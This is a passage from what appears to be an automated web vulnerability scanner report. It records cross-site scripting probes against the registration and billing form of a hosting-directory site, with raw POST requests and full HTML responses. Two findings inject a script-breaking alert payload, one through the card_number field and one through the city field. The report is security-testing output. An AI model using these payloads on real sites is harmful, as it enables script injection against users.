(f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD535EDBEEF09CD52A7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD56326706CDA48A5666F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD52D4259DEFE7E7233C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5F58A6285C00CF0FAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD51EE2B3CA1BDFF12B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5AEB9DB5E203A3EA2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5FE52339621074957C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD53E6CC0EB282283846F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD54D859A64CCB486D8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD5A779F73C387C86F66F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD5AA78B0998B93870CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5ACEE002C95AACDDBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD5A894CAEB8DBC0932C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD58E147E28EB96B096C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5DF8FD88BDECC6FCBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD566D0D65657C79CD4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD59C514F87DDE1C3636F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD5D506B7B0E9C0CE136F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD519DF4D258A75B9D76F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
'"--></style></script><script>alert(0x001CAE)</script>
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CAE)%3c%2fscript%3e&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD5814F11C5A51949F6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD53665AA4153F5D36D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD57CCB24FA701CA5AAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD574C01615F2204DB5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD5E1DF0F33A746AFE46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5708C3BA44C390CE5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD536F89D34AB275142C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5CE8855F0D2D1A31D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD577CC1FECA0F66274C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD53F573561FA6A956D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD5B74DCAA0223F847DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD50642A8CAD5E7DDD8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD50474F9FDB809CF2DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD58171E88F6EAA838CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5BE813C6E90B86431C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD5CE4F82ADA925DB8AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD579978B007FFFC2A26F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD5436FA9420F11FE196F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD5D5E248BE74D784896F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
'"--></style></script><script>alert(0x001CBE)</script>
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CBE)%3c%2fscript%3e&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must 